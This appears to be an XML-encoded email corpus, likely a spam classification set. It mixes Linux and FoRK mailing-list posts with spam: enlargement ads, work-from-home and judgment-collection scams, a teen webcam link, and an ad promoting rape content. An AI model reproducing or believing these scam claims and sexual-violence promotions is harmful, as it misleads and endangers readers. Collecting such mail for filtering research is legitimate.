 =BB=E3=BF=EE=D3=EB=CF=D6=BD=F0=C1=BD=D6=D6=A1=A3
     =A3=A85=A3=A9=D1=A7=D4=B1=BD=C9=B7=D1=BA=F3=A3=AC=C1=EC=C8=A1=BF=CE=B3=CC=
 =B1=ED=BA=CD=BD=CC=B2=C4=D7=CA=C1=CF=A1=A3
     =A3=A86=A3=A9=B1=A8=C3=FB=BD=D8=D6=B9=CA=B1=BC=E4=A3=BA2002=C4=EA5=D4=C2
     =A3=A87=A3=A9=BF=AA=BF=CE=CA=B1=BC=E4=A3=BA=B5=DA=D2=BB=B4=CE=C3=E6=CA=DA=
 =CA=B1=BC=E4=CE=AA2002=C4=EA6=D4=C2=A1=A3
 --3daab575-64bd-11d6-b6fa-0050ba415022--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Re: Archer-UK TV Alert
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, I enjoyed it.
 Then afterwards, there was a debate thing on ITV about genius or madness,
 featuring a friend of mine's boss plus David Icke, also the very likeable
 Evelyn Glennie.
 Dave
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Take your love life to the next level               ZIB
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;FONT SIZE=3D"4"&gt;&lt;B&gt; A man endowed with a 7-8" hammer is simply&lt;br&gt;
  better equipped than a man with a 5-6"hammer. &lt;BR&gt;
 &lt;BR&gt;Would you rather have&lt;br&gt;more than enough to get the job done or fall =
 short. It's totally up&lt;br&gt;to you. Our Methods are guaranteed to increase y=
 our size by 1-3"&lt;br&gt; &lt;A HREF=3D"http://209.163.187.47/cgi-bin/index.php?10=
 004"&gt;Come in here and see how&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;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</si>
  <si>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Dave Long &lt;dl@silcom.com&gt; writes:
 &gt; &gt; It also strikes me that it will not be very long before livestock is
 &gt; &gt; genetically engineered to be dumber and meatier, and better adapted to
 &gt; &gt; living in industrial conditions.
 &gt; 
 &gt; If we're willing to count artificial
 &gt; selection as genetic engineering, it
 &gt; has been happening since pre-literate
 &gt; times, and is called "domestication".
 But we're not willing to count it, I hope, since it isn't, any more
 than natural selection is genetic engineering.
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] staroffice 6.0 installation freezes under RH7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 19, 2002 at 11:50:25AM +0100, Colin Nevin wrote:
 &gt; Hi All,
 &gt; 
 &gt; Just wondering if anyone has ever installed StarOffice
 &gt; 6.0 (or Open Office), and if any have experienced any
 &gt; problems with the install freezing ?
 Maybe give us some more information about your hardware.
 If you happen to be using an S3 Savage graphics card (as used in
 the IBM Thinkpad T20 and probably others) and you get strange display
 problems plus the freezing problem then set this environment variable:
   SAL_DO_NOT_USE_INVERT50=true
 You will need this environment variable set when running soffice,
 so you should add an export line to your .bashrc.
 Hope this helps,
 David
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------------------------------------------------------------------
 What is MIME?
 MIME stands for "Multipurpose Internet Mail Extensions".  It is the
 standard for how to send multipart, multimedia, and binary data using the
 world-wide Internet email system.  Typical uses of MIME include sending
 images, audio, wordprocessing documents, programs, or even plain text
 files when it is important that the mail system does not modify any part
 of the file.  MIME also allows for labelling message parts so that a
 recipient (or mail program) may determine what to do with them. 
 How can I read a MIME message?
 Since MIME is only a few years old, there are still some mailers in use
 which do not understand MIME messages.  However, there are a growing
 number of mail programs that have MIME support built-in.  (One popular
 MIME-capable mailer for Unix, VMS and PCs is Pine, developed at the
 University of Washington and available via anonymous FTP from the host
 ftp.cac.washington.edu in the file /pine/pine.tar.Z)
 In addition, several proprietary email systems provide MIME translation
 capability in their Internet gateway products.  However, even if you do
 not have access to a MIME-capable mailer or suitable gateway, there is
 still hope! 
 There are a number of stand-alone programs that can interpret a MIME
 message.  One of the more versatile is called "munpack".  It was developed
 at Carnegie Mellon University and is available via anonymous FTP from the
 host ftp.andrew.cmu.edu in the directory pub/mpack/.  There are versions
 available for Unix, PC, Mac and Amiga systems.  For compabibility with
 older forms of transferring binary files, the munpack program can also
 decode messages in split-uuencoded format. 
 Does MIME replace UUENCODE?
 Yes.  UUENCODE has been used for some time for encoding binary files so
 that they can be sent via Internet mail, but it has several technical
 limitations and interoperability problems.  MIME uses a more robust
 encoding called "Base64" which has been carefully designed to survive the
 message transformations made by certain email gateways. 
 How can I learn more about MIME?
 The MIME Internet standard is described in RFC-1521, available via
 anonymous FTP from many different Internet hosts, including: 
      o  US East Coast                            
         Address:  ds.internic.net (198.49.45.10)        
      o  US West Coast                            
         Address:  ftp.isi.edu (128.9.0.32)      
      o  Pacific Rim                              
         Address:  munnari.oz.au (128.250.1.21)  
      o  Europe                                   
         Address:  nic.nordu.net (192.36.148.17) 
 Look for the file /rfc/rfc1521.txt
 Another source of information is the Internet news group "comp.mail.mime",
 which includes a periodic posting of a "Frequently Asked Questions" list.
 --------------------------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;&lt;HEAD&gt; 
 &lt;TITLE&gt;ZDNet Announcements&lt;/TITLE&gt;
 &lt;div align="center"&gt;
 &lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE bgColor=#232850 border=0 cellPadding=0 cellSpacing=0 width=624&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=624&gt;&lt;IMG alt="" height=53 src="http://www.zdnet.com/graphics/newsletters/hd_announcement.gif" width=624&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;table width="624" border="0" cellspacing="0" cellpadding="0"&gt;
 &lt;TBODY&gt;
 &lt;tr&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="7" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="622" height="6" colspan="3" bgcolor="#1E5C99"&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="6" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="7" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="10" height="1" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="600" height="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="600" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="10" height="1" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/TBODY&gt;
 &lt;/table&gt;
 &lt;TABLE bgColor=#232850 border=0 cellPadding=0 cellSpacing=0 width=624&gt;
   &lt;TBODY&gt;
   &lt;TR bgColor=#ffffef&gt;
     &lt;TD bgColor=#83A3CB rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 rowSpan=2 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#000000 rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
       &lt;TD align=middle height=32 width=600&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD bgColor=#000000 rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 rowSpan=2 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#83A3CB rowSpan=2 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#cccccc&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE bgColor=#ffffff border=0 cellPadding=0 cellSpacing=0 width=624&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#83A3CB width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#000000 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
       &lt;TD width=600&gt;&lt;FONT color=#333333 face="verdana, geneva" 
       size=-2&gt;&amp;nbsp;&lt;SUP&gt;&amp;nbsp;&lt;/SUP&gt; 
         &lt;!-- date --&gt;
         July 10, 2002 
         &lt;!-- /date --&gt;
         &lt;/FONT&gt;&lt;BR&gt;
         &lt;!-- ### promo content ### --&gt;
       &lt;TABLE align=center width=580&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
             &lt;TD&gt; 
               &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FF3333"&gt;&lt;b&gt;Exclusive 
                 Offer for ZDNet&lt;/b&gt;&lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FF3333"&gt;&lt;b&gt; 
                 Members... &lt;br&gt;
                 &lt;/b&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvFTl_BKqBxDVAmoBameR" &gt;&lt;img src="http://cma.zdnet.com/graphics/zdnet_rewards_bug.gif" width="139" height="40" border="0" alt="Click Here to Visit ZDNet Rewards!"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4" color="#FF3333"&gt;&lt;b&gt;Now 
                 40% off! &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Dear 
                 ZDNet Member:&lt;/font&gt;&lt;/FONT&gt; &lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Just a quick 
                 note to let you know that your ZDNet membership now qualifies 
                 you for a special 40% discount on &lt;b&gt;ZDNet&lt;font color="ff3333"&gt; 
                 Rewards&lt;/font&gt;&lt;/b&gt;, our advanced tech service! Join &lt;b&gt;ZDNet&lt;font color="ff3333"&gt; 
                 Rewards&lt;/font&gt;&lt;/b&gt; and you get all &lt;br&gt;
                 these great benefits:&lt;/font&gt;&lt;/p&gt;
               &lt;ul&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Interactive 
                     Web design classes:&lt;/b&gt; learn online, at your own pace&lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Subscription 
                     to Computer Shopper magazine&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Access 
                     to ZDNet's private tech research center&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Members-only 
                     online forum&lt;/b&gt; for expert PC guidance and support&lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
                 &lt;li&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;WebFerretPRO: 
                   &lt;/b&gt; a FULL copy of the ultimate Web search utility&lt;/font&gt;&lt;/li&gt;
                 &lt;li&gt; 
                   &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;And 
                     more&lt;/b&gt;... &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQCUpdA98BbBL7kOi_yR" &gt;&lt;b&gt;try 
                     it now!&lt;/b&gt;&lt;/a&gt; &lt;/font&gt;&lt;/div&gt;
                 &lt;/li&gt;
               &lt;/ul&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Try &lt;b&gt;ZDNet&lt;font color="ff3333"&gt; 
                 Rewards&lt;/font&gt;&lt;/b&gt; for a full month for just $1 -- and if you 
                 love using these advanced features, you can become a full member 
                 for 40% off the regular cost! Go here for all the details:&lt;/font&gt;&lt;/p&gt;
               &lt;table width="80%" border="2" align="center" cellpadding="10" bordercolor="#000000" bgcolor="#FFFFCC"&gt;
                 &lt;tr&gt; 
                   &lt;td&gt; 
                     &lt;div align="center"&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOrxdzmlKMZ2Fz8IR7XlR" &gt;Join 
                         today and get your first month for just $1!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt; 
                     &lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Thanks for 
                 being a part of ZDNet, the premier technology community. &lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;-- The ZDNet 
                 team&lt;br&gt;
                 &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;/p&gt;
               &lt;/TD&gt;
           &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ### /promo content ### --&gt;&lt;/TD&gt;
     &lt;TD bgColor=#000000 width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD bgColor=#1E5C99 width=10&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD bgColor=#83A3CB width=1&gt;&lt;IMG alt="" height=1 
       src="http://www.zdnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=624&gt;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width="624"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href='http://clickthru.online.com/Click?q=2f-hYfFzInu3VK3rWHE2V22j7XLQtJgVRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMOux7kEMLKlXBDgnVsR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMcOgNglpW-B_KMqztFR"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width=624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width=624 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bizmb4QA5K-fxuEL59R" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lFg7QgVtuoAABMMPZ9rR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabmTJRslCW5CH7esbKRiR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45sdc34QhaIHsSzky0PR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7TfUen4gVnxXFZcIuInR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVTSzy79RmBekeVktk2eR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2AvfGHPk1kOqFb2GVaGyR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-YjD18-_XGuwrfzJ6nnR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfbndSbnIz4s1RhjGRseR" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=624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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e550&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=2c-DaaOnu0wRUKT1GOCNPvzp70JrRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; their opportunities for finding women _will_ be scarce.  
 What is silly and antiquated depends a lot on which country you live in.
 I don't have statistics on the love half life, but it seems long-term 
 relationships use something else for glue.
 Clearly our non-silly non-antiquated ideas about relationships have
 resulted in mostly short-duration relationships and single-parented,
 dysfunctional kids (not enough of them too boot, so to keep our
 demographics from completely keeling over we're importing them from places
 with mostly silly and antiquated ideas).
 At least from the viewpoint of demographics sustainability and
 counterpressure to gerontocracy and resulting innovatiophobia we're doing
 something wrong.
 Maybe we should really go dirty Tleilaxu all the way.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 100 Lazy People Wanted! ilob
</t>
  </si>
  <si>
    <t xml:space="preserve">We are desperately looking for 100 lazy people 
             who wish to make lots of money without working.
          We are not looking for people who are self-motivated.
          We are not looking for people who join every 'get rich 
                    quick' scheme offered on the Internet.
             We are not looking for class presidents, beautiful 
             people, career builders or even college graduates.  
    We don't even want union workers or trade school graduates.
          We want the laziest people that exist - the guys and 
        gals who expect to make money without lifting a finger.  
            We want the people who stay in bed until noon.
     We want those of you who think that getting out of bed to go 
       lay on the couch is an effort that is best not thought about.
                           If you meet these criteria, go to:
                          livinghealthytoday@hotmail.com 
              and type in the Subject Line the following words:
                              "I do not want to work".  
             In fact, if you are so lazy that typing those words 
              in the Subject line is an effort, than don't bother.  
          Just click on the email and we'll know that you want 
      us to send you the domain name anyhow, because then 
               we will be absolutely certain that you are the 
                              kind of person we want.
                In case you haven't figured it out yet, we want 
                  the kind of people who DO NOT take risks.  
         If you are the kind of person who will consider doing 
      something that's NOT a 'sure thing', then do NOT respond.  
                   This is too easy a way to make money 
                          and there's no challenge in it.
             If you can get to the website that we are going 
               to email you, you will be able to see the first 
        home business in history that requires no work.  NONE.  
                By clicking on this email and then going to 
                this website, you will be telling us that you 
             want to make enough money that you can quit 
                      your regular job and sleep all day.  
              We are not looking for a commitment from you 
                    and we don't even want your money. 
               As a matter of fact, we don't even want you 
             to hear from us again if the idea of making lots 
            of money without working does not interest you.  
                                   So this is the first 
                                and last email we will 
                                     ever send you.   
                                   That is a promise.
                         So if nothing else, remember this -  
                     to make money without working for it just 
                       send an email with the following words 
                  in the subject line:  "I do not want to work" to:
                              livinghealthytoday@hotmail.com 
                       and we will email you back with the 
                        website that gives you information 
                             on the best of both worlds - 
                a way to make money without having to work.
                      We look forward to hearing from you.
                      In all seriousness,
                           Rick
 This email ad is being sent in full compliance
 with U.S. Senate Bill 1618, Title #3, Section 301
 ****** to remove yourself send a blank email *****
 ****** ****to: removal495721@yahoo.com *** *****
 mmxrxrxhfqlwfokhcb
</t>
  </si>
  <si>
    <t xml:space="preserve">Actually, this is common. I've known a couple of
 people who have suffered this. Believe it or not,
 you were lucky. You were home, rather than on
 vacation, and so you didn't have the intake line
 flowing onto the floor for two weeks.
 Now, don't you feel better?
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get Paid For What You Know                         18436
</t>
  </si>
  <si>
    <t xml:space="preserve">
 OPRAH, NIGHTLINE, MARIA SHRIVER, 48 HOURS, 20/20, 
 PLAYBOY, KIPLINGERS and more have all interviewed this 
 FAMOUS Private Investigator, seeking to find how he made 
 his fortune.  Take a moment and learn his long sought after SECRETS.
 This PI is the originator of seeking out Judicial Judgments and using 
 them to make a FORTUNE!  Most people have no idea what a 
 Judicial Judgment is, much less how to process them to earn a very 
 substantial income.
 Heres the SCOOP-  When one person or business files suit against 
 another and wins, the winner then has a JUDICIAL JUDGMENT.
 BUT, even though they won- guess what? They soon find out these 
 SHOCKING FACTS:
 a) Its now up to them to Collect on the Judgment
 b) The court does not require the loser to pay you. 
 c) The court will not help you to collect it. 
 d) Employees of the court are FORBIDDEN BY LAW from telling 
 you how to collect the judgment. 
 All the winner really has is a WORTHLESS piece of paper. They 
 must trace the loser down, find their assets; their employment, bank 
 accounts, real estate, stocks and bonds, etc. And THE WINNER 
 has to pay all the expenses to find this out.  All of a sudden that 
 BIG CASH SETTLEMENT the person got, has become an 
 expense instead of an asset!  
 WHAT HAPPENS THEN?- MILLIONS of Judgments just sit in 
 files and become forgotten. people give up trying.  Right now in the 
 United States there are between 200 and 300 BILLION dollars of 
 uncollected JUDICIAL JUDGMENTs. For every Judgment that is paid, 
 5 or more unpaid Judgments take its place. 
 So how does this Private Investigator make a FORTUNE collecting 
 other peoples judgments?  Thats what we want to tell you.  
 Through long and hard work, this Sleuth has learned a 
 process that will turn these forgotten useless pieces of paper 
 into a FORTUNE without the high collection cost.
 The income potential is substantial in this profession! Using the 
 techniques taught in his course , people are now working full-time 
 making $96,000.00 to over $200,000.00 per year. Part-time 
 associates are earning between $24,000.00 and $100,000.00 per 
 year. Most choose to work out of their homes, others build sizable 
 organizations.
 Today, people trained in this business opportunity are processing 
 over 500 million dollars in JUDICIAL JUDGMENTs!  AND, 
 new judgments become available every day.  The work is
 ALWAYS there, you just need to know how to go about it. 
 This is a GREAT OPPORTUNITY for anyone who wants to start 
 something on the side that will offer a solid income in the future. 
 It is also ideal because you determine how much time you want to 
 spend doing this and when. Make no mistake though-THIS IS NOT 
 A GET RICH QUICK SCHEME. It requires effort on your part.  
 The more effort the bigger the reward.  You choose how much you 
 want to make!
 If you've ever dreamed the American Dream financial freedom 
 this may very well be the opportunity youve been looking for.  
 This business can also protect you from corporate downsizing. 
 It might also be your ticket to freedom from others telling you what
 to do. This business lets you control your destiny! You dont need 
 to be a rocket scientist either! Our training has made this happen for 
 many others already. Make it happen for you too!
 Take the first step and talk it over with one of our trained 
 counselors by calling 1-720-733-7315.  Let them answer your 
 questions so that youll know if its right for you.  There is no cost 
 or obligation on your part except the cost of a phone call.  
 Join a small number of people who are reaping the BIG 
 REWARDS, by calling us at 1-720-733-7315 today!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 !Want to make a million bucks this year?
 Me too but it's probably not going happen!
 However if your looking for the opportunity to
 make a couple thousand a week,
 working form home, with your pc, we need to talk.
 If you're over 18 and a US resident,
 Just Click REPLY
 Send me your Name, State,
 Complete telephone number,
 and the best time to contact you.
 I will personally speak with you within 48 hours.
 To be removed from this mailing list,  please type remove in the subject column.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Surprise :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;style type=text/css&gt;
 a { text-decoration: none; color:#ffcccc }
 &lt;/style&gt;
 &lt;body text="#ffbbbb" bgcolor="#333333" link="#EE0000" vlink="#EE0000" alink="#EE0000"&gt;
 &lt;p align=center&gt;&lt;a class="a" href="http://pan.recreation-deals.com/?refid=017dfc9e"&gt;
 &lt;font size=+1 color=yellow&gt;&lt;b&gt;You are just 1 click from The World Of Violence And FORCED SEX
 The Brutality Of RAPE!!!&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;/a&gt;
 &lt;p align=center&gt;
 &lt;a href="http://pan.recreation-deals.com/?refid=017dfc9e"&gt;&lt;b&gt;&lt;font size=+3&gt;CLICK HERE TO SEE&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;&lt;font size=-1 color=#999999&gt;&lt;a href="http://pan.recreation-deals.com/unsub.cgi?em=fork@xent.com"&gt;&lt;font size=-1 color=#999999&gt;[ CLICK HERE TO UNSUBSCRIBE ]&lt;/font&gt;&lt;a&gt;
 &lt;/body&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] FREE FREE FREE!
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (reenspring@happyman.com) on Thursday, August 8, 2002 at 08:36:27
 ---------------------------------------------------------------------------
 message: - - - - - FREE FREE FREE! - - - - - Thats right free unlimited web cam feeds! - chat! - pictures! - videos! -   ALL FREE!!! YOU PAY NOTHING!!! NOT ONE CENT! - This is a limited time offer because these gitls can't work for free so hurry up and click this link! http://teensforfree.cjb.net  
 ---------------------------------------------------------------------------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">"British scientists were honoured for research that found ostriches became
 more amorous with each other when a human was around. In fact, ostriches
 eventually started putting the moves on humans."
 this is true of manatees also.  you don't want to know.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Carey
 Sent: Friday, October 04, 2002 2:03 PM
 To: fork@example.com
 Subject: Headline - Navel gazing wins an Ig Nobel
 Greetings,
 Carey wants you to know about a story on www.theage.com.au
 Personal Message:
 Ah the Ig Nobels, always worth a read :)  If only they had a cat-mood
 decipherer.  ^__^
 Navel gazing wins an Ig Nobel
 By Jay Lindsay &lt;br&gt;Boston
 October 05 2002
 URL: http://www.theage.com.au/articles/2002/10/04/1033538774048.html
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 04:10:57PM +0100, John P. Looney mentioned:
 &gt; &gt; I think this procedure is described in the RAID HOWTO for installing a
 &gt; &gt; new system, but it applies just as well to a running system.
 &gt; 
 &gt;  Just double checking (I'd be pissed if I just wiped my installation!)...
  Well, this mostly worked, despite Colm saying that "you want the
 "failed-disk" *instead* of the second "raid-disk", not in addition to it".
  I suppose that means instead of:
 &gt; raiddev /dev/md0
 &gt;         raid-level      1
 &gt;         nr-raid-disks   2
 &gt;         nr-spare-disks  0
 &gt;         chunk-size     4
 &gt;         persistent-superblock 1
 &gt;         device          /dev/hdg3
 &gt;         raid-disk       0
 &gt;         device          /dev/hda5
